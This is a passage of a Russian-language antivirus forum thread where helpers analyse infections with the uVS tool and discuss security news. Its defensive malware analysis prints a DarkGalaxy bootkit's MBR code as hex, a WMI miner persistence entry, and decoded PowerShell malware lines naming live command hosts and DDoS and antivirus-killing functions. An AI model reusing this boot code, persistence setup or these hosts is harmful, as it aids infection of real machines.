поговорить о uVS, Carberp, планете Земля

RSS

Сообщений: 6770

Баллов: 5416

Регистрация: 12.09.2011

Размещено 21.11.2011 19:06:42

Обсуждаем Carberp всех модификаций

Цитата
;uVS v3.71 script [http://dsrt.dyndns.org] zoo %SystemDrive%\DOCUMENTS AND SETTINGS\HOUSE\ГЛАВНОЕ МЕНЮ\ПРОГРАММЫ\АВТОЗАГРУЗКА\IGFXTRAY.EXE bl 6D99C48BBD436116B78A04997D854F57 164352 delall %SystemDrive%\DOCUMENTS AND SETTINGS\HOUSE\ГЛАВНОЕ МЕНЮ\ПРОГРАММЫ\АВТОЗАГРУЗКА\IGFXTRAY.EXE delall %SystemDrive%\DOCUMENTS AND SETTINGS\ALL USERS\APPLICATION DATA\ICQ\ICQNEWTAB\NEWTAB.HTML regt 1 regt 2 regt 7 regt 18 deltmp delnfr restart

Цитата

;uVS v3.71 script [http://dsrt.dyndns.org]

zoo %SystemDrive%\DOCUMENTS AND SETTINGS\HOUSE\ГЛАВНОЕ МЕНЮ\ПРОГРАММЫ\АВТОЗАГРУЗКА\IGFXTRAY.EXE
bl 6D99C48BBD436116B78A04997D854F57 164352
delall %SystemDrive%\DOCUMENTS AND SETTINGS\HOUSE\ГЛАВНОЕ МЕНЮ\ПРОГРАММЫ\АВТОЗАГРУЗКА\IGFXTRAY.EXE
delall %SystemDrive%\DOCUMENTS AND SETTINGS\ALL USERS\APPLICATION DATA\ICQ\ICQNEWTAB\NEWTAB.HTML
regt 1
regt 2
regt 7
regt 18
deltmp
delnfr
restart

Изменено: Арвид - 22.11.2011 13:07:19

Правильно заданный вопрос - это уже половина ответа

Ответы

Пред. 1 ... 144 145 146 147 148 ... 167 След.

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 20.10.2018 06:13:55

Цитата
RP55 RP55 написал: А здесь у нас WMI...

и не только.
возможно было два конкурирующих продукта майнеров (BOOT.DarkGalaxy
https://www.virustotal.com/ru/file/8a7f542b6cff744dd7d80eb510b6359e9214640c03ded5dc1acfe5274d891103/analysis/1540003309/
и WMI-майнер AdylKuzz)

Цитата
Полное имя MBR#0 [931,5GB] Имя файла MBR#0 [931,5GB] Тек. статус ?ВИРУС? ВИРУС загрузчик Обнаруженные сигнатуры Сигнатура Trojan.Boot.DarkGalaxy.a [Kaspersky] (delall) [глубина совпадения 64(64), необх. минимум 64, максимум 64] 2018-09-14 www.virustotal.com Хэш НЕ найден на сервере. www.virustotal.com 2018-10-20 Kaspersky Trojan.Boot.DarkGalaxy.a DrWeb Trojan.NtRootKit.19689 Сохраненная информация на момент создания образа Статус загрузчик Размер 440 байт Доп. информация на момент обновления списка SHA1 70AF4248427B9FDB75AEB76CF5DB95D2FA55B803 #BINOBJ# 29DB29C0FA5317368926FE7BBCFE7B1E6660531F3EA1130424FC83E8403EA31304C1E0068EC0FC0E58C1E004E8000083E82F5E01C631FFB90001F3A51E066A0007B83C02B90300BA8000BB007ECD13071FBE047EBF0002E805000668BE00CB60BB008029ED29D229C029C94DE8030061C3A4E8400072FA41E83500E34073F983E903720688CCACF7D09531C9E8210011C9750841E8190073FB414181FD00F383D1018D03961E06061FF3A4071F96EBC2E8020011C901DB7504AD11C093C3B8AA55CD153D55AA7403E8350131D28EC2B80102B90200BA8000BB007CCD1366611F5CEA007C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002C4463FA42EBE500000001010007FEFFFF3F000000809D841E00FEFFFF07FEFFFFBF9D841E98E5691800FEFFFF07FEFFFF5783EE366AD6813D0000000000000000000000000000000055AA

Цитата

Полное имя MBR#0 [931,5GB]
Имя файла MBR#0 [931,5GB]
Тек. статус ?ВИРУС? ВИРУС загрузчик

Обнаруженные сигнатуры
Сигнатура Trojan.Boot.DarkGalaxy.a [Kaspersky] (delall) [глубина совпадения 64(64), необх. минимум 64, максимум 64] 2018-09-14

www.virustotal.com Хэш НЕ найден на сервере.
www.virustotal.com 2018-10-20
Kaspersky Trojan.Boot.DarkGalaxy.a
DrWeb Trojan.NtRootKit.19689

Сохраненная информация на момент создания образа
Статус загрузчик
Размер 440 байт

Доп. информация на момент обновления списка
SHA1 70AF4248427B9FDB75AEB76CF5DB95D2FA55B803

#BINOBJ# 29DB29C0FA5317368926FE7BBCFE7B1E6660531F3EA1130424FC83E8403EA31304C1E0068EC0FC0E58C1E004E8000083E82F5E01C631FFB90001F3A51E066A0007B83C02B90300BA8000BB007ECD13071FBE047EBF0002E805000668BE00CB60BB008029ED29D229C029C94DE8030061C3A4E8400072FA41E83500E34073F983E903720688CCACF7D09531C9E8210011C9750841E8190073FB414181FD00F383D1018D03961E06061FF3A4071F96EBC2E8020011C901DB7504AD11C093C3B8AA55CD153D55AA7403E8350131D28EC2B80102B90200BA8000BB007CCD1366611F5CEA007C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002C4463FA42EBE500000001010007FEFFFF3F000000809D841E00FEFFFF07FEFFFFBF9D841E98E5691800FEFFFF07FEFFFF5783EE366AD6813D0000000000000000000000000000000055AA

[ Как создать образ автозапуска? ]

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 04.11.2018 17:37:02

кроме того, там же,
по уже после очистки от BOOT.DarkGalaxy, система была не пропатчена, и еще раз произошло заражение через сетевую атаку и WMI

можно предположить, что на этот раз в WMI был прописан запуске через powershell закодированного скрипта.

Цитата
powershell.exe в Windows и грузит ЦП на 50%

Цитата
Процесс: 1 Spyware.InfoStealer.Themida, C:\WINDOWS\TEMP\COHERNECE.EXE, Проигнорировано пользователем, [8497], [529451],1.0.7465 Модуль: 1 Spyware.InfoStealer.Themida, C:\WINDOWS\TEMP\COHERNECE.EXE, Проигнорировано пользователем, [8497], [529451],1.0.7465 Инструментарий управления Windows (WMI): 3 Hijack.BitCoinMiner.WMI.Generic, \\WIN-5CAGQT8ID9L\ROOT\subscription:__FilterToConsumerBinding.Consumer="CommandLineEventConsumer.Name="Windows Events Consumer"",Filter="__EventFilter.Name="Windows Events Filter"", Проигнорировано пользователем, [14167], [528077],1.0.7465 Hijack.BitCoinMiner.WMI.Generic, \\WIN-5CAGQT8ID9L\ROOT\subscription:__EventFilter.Name="Windows Events Filter", Проигнорировано пользователем, [14167], [528077],1.0.7465 Hijack.BitCoinMiner.WMI.Generic, \\WIN-5CAGQT8ID9L\ROOT\subscription:CommandLineEventConsumer.Name="Windows Events Consumer", Проигнорировано пользователем, [14167], [528077],1.0.7465

Цитата

Процесс: 1
Spyware.InfoStealer.Themida, C:\WINDOWS\TEMP\COHERNECE.EXE, Проигнорировано пользователем, [8497], [529451],1.0.7465

Модуль: 1
Spyware.InfoStealer.Themida, C:\WINDOWS\TEMP\COHERNECE.EXE, Проигнорировано пользователем, [8497], [529451],1.0.7465

Инструментарий управления Windows (WMI): 3
Hijack.BitCoinMiner.WMI.Generic, \\WIN-5CAGQT8ID9L\ROOT\subscription:__FilterToConsumerBinding.Consumer="CommandLineEventConsumer.Name="Windows Events Consumer"",Filter="__EventFilter.Name="Windows Events Filter"", Проигнорировано пользователем, [14167], [528077],1.0.7465
Hijack.BitCoinMiner.WMI.Generic, \\WIN-5CAGQT8ID9L\ROOT\subscription:__EventFilter.Name="Windows Events Filter", Проигнорировано пользователем, [14167], [528077],1.0.7465
Hijack.BitCoinMiner.WMI.Generic, \\WIN-5CAGQT8ID9L\ROOT\subscription:CommandLineEventConsumer.Name="Windows Events Consumer", Проигнорировано пользователем, [14167], [528077],1.0.7465

+
добавлю строки из раскодированного скрипта.
взят из другого примера.

Цитата
$se=@(('update.7h4uk.com'),('info.7h4uk.com'),('185.128.43.62'),('185.234.217.139')) $defun=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)) RunDDOS "cohernece.exe" KillBot('System_Anti_Virus_Core')

[ Как создать образ автозапуска? ]

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 11.11.2018 06:01:24

ESET machine-learning engine Augur versus the most infamous ransomware families of 2017

(ESET машинное обучение в движке Augur против наиболее известных семейств ransomware 2017 года)

Чтобы продемонстрировать результаты Augur, мы протестировали его ранние сборки, полученные в первые месяцы 2017 года, против самых распространенных штампов ransomware, ориентированных на бизнес-среду в конце этого года. Набор тестов включал в себя образцы Diskcoder.C / NotPetya, DiskCoder.D / BadRabbit и WannaCryptor.D / WannaCry, а также множество вариантов Crysis ransomware.

Результаты показывают, что, несмотря на то, что модель Augur на несколько месяцев старше образцов вредоносных программ, коэффициент обнаружения файлов высокий, в некоторых случаях близок к безупречному. Тем не менее, самым важным результатом является то, что Augur смог правильно идентифицировать вредоносный характер образца в момент его запуска в память зараженного устройства. Это предоставит защитникам возможность остановить угрозу до того, как она может нанести серьезный ущерб в инфраструктуре компании.

https://www.eset.com/us/about/newsroom/corporate-blog/eset-machine-learning-engine-augur-versus-the-most-infamous-ransomware-families-of-2017/

https://www.welivesecurity.com/wp-content/uploads/2018/08/Can_AI_Power_Future_Malware.pdf

[ Как создать образ автозапуска? ]

Сообщений: 6234

Баллов: 4987

Регистрация: 25.05.2010

Размещено 27.11.2018 06:22:37

Инструмент очистки Chrome получит функцию удаления «принудительно установленных расширений»
«Инструмент очистки Chrome» – программа, созданная Google, которая включает движок обнаружения и удаления угроз от компании ESET. Данный компонент часто фигурирует под кодовыми именами "Chrome Protector" или "Chrome Cleanup".

Chrome будет регулярно запускать этот инструмент, загружать новейшие сигнатурные определения и обновления движка с серверов ESET и выполнять сканирование компьютера на нежелательные программы. В случае обнаружения вредоносного объекта, который может нарушать работу Chrome, инструмент предложит удалить обнаруженную угрозу.

Пользователи могут самостоятельно запустить сканирование, перейдя на страницу chrome://settings/cleanup в браузере.

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 25.12.2018 18:48:45

https://www.virusradar.com/en/Win64_Vools.B/description

Цитата
Win64/Vools.B is a trojan that spreads via network exploiting vulnerabilities of the operating system. The trojan generates various IP addresses. It connects to remote machines to port 445 in attempt to exploit the Microsoft Server Message Block (SMB) vulnerability. This vulnerability is described in Microsoft Security Bulletin MS17-010 . If it succeeds, a copy of the trojan is retrieved from the attacking machine.

Цитата

Win64/Vools.B is a trojan that spreads via network exploiting vulnerabilities of the operating system.
The trojan generates various IP addresses.
It connects to remote machines to port 445 in attempt to exploit the Microsoft Server Message Block (SMB) vulnerability.
This vulnerability is described in Microsoft Security Bulletin MS17-010 .
If it succeeds, a copy of the trojan is retrieved from the attacking machine.

[ Как создать образ автозапуска? ]

Сообщений: 6234

Баллов: 4987

Регистрация: 25.05.2010

Размещено 02.01.2019 19:02:33

Цитата
Firefox может показывать рекламу на странице новой вкладки.

https://www.comss.ru/page.php?id=5684

Цитата
Организация Mozilla уже успела выпустить официальное заявление: Данная заметка является экспериментальной и предлагает пользователям Firefox дополнительные преимущества от нашего партнера.

Сообщений: 6234

Баллов: 4987

Регистрация: 25.05.2010

Размещено 12.01.2019 13:29:36

Статья про левые ЭЦП - Здесь.
Удивительно дело - в первые в истории человечества. ;)

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 13.01.2019 10:41:52

Цитата
RP55 RP55 написал: Статья про левые ЭЦП - Здесь. Удивительно дело - в первые в истории человечества.

ну да, об этом еще Маяковский писал, что "к мандатам почтения нету, к любым чертям с матерями катись любая бумажка, но эту...."

.

Системам обнаружения вредоносных программ нужны файлы с маркировкой, чтобы защитить компьютеры, подключенные к Интернету, от заражения. Тем не менее, огромное количество программных файлов, поступающих с непопулярных веб-сайтов, все еще не помечены и остаются неизвестными или неопределенными угрозами.

какую маркировку они имеют ввиду?

[ Как создать образ автозапуска? ]

Сообщений: 6234

Баллов: 4987

Регистрация: 25.05.2010

Размещено 13.01.2019 20:10:12

Цитата
santy написал: какую маркировку они имеют ввиду?

Здесь видимо о:

Так у COMODO в их продуктах есть список вендоров: ( надёжные вендоры )

у Kaspersky есть: Kaspersky Application Advisor ( Whitelist ) информация об уровне безопасности файлов.
файлы проверяются на наличие авторизованных сертификатов. ( Trusted )

Рейтинг файлов\процессов в ESET

Получается, если файл уже известен от получает ту, или иную маркировку\метку.

Как известно у продуктов есть уровни реагирования.
Если A.V. продукт начнёт блокировать любой новый\неизвестный\модифицированный\битый файл - то пользователи не будут от этого в восторге.

Сообщений: 6234

Баллов: 4987

Регистрация: 25.05.2010

Размещено 23.01.2019 21:01:32

http://www.tehnari.ru/f183/t262601/

C:\USERS\1\APPDATA\ROAMING\TEMPO\
юмористы.
или почему правая нога не знает, что чешет левая.
NSCPUCNMINER32.EXE

Пред. 1 ... 144 145 146 147 148 ... 167 След.